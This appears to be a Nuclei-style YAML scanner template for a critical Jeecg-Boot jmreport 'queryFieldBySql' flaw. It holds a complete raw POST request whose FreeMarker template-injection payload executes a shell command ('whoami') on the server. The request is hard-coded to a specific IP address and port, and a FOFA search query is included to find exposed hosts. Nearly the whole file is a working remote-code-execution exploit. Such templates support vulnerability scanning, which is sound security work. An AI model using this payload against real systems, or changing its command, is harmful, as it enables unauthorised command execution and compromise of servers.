http:
    - matchers:
        - dsl:
            - contains(body,"解析成功")
          type: dsl
      matchers-condition: and
      payloads:
        rce:
            - whoami
      raw:
        - "POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1\nHost: 111.53.104.81:92\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\nContent-Length: 107\nContent-Type: application/json\nAccept-Encoding: gzip\n\n{\"sql\":\"select 'result:<#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()> ${ ex(\\\"{{rce}} \\\") }' \"}\n\n   \n"
      req-condition: true
id: jeecgboot-queryFieldBySql-sqli-rce
info:
    author: sb
    metadata:
        fofa-query: title="index" && header="lighttpd/1.4.30"
    name: jeecgboot-queryFieldBySql-sqli-rce
    severity: critical
    tags:
        - JEECG
        - Jeecg-Boot
        - Lighttpd
        - lighttpd
variables:
    rand: '{{rand_base(3)}}'
    s1: '{{rand_base(5, "56789")}}'
    str: '{{rand_base(4)}}'
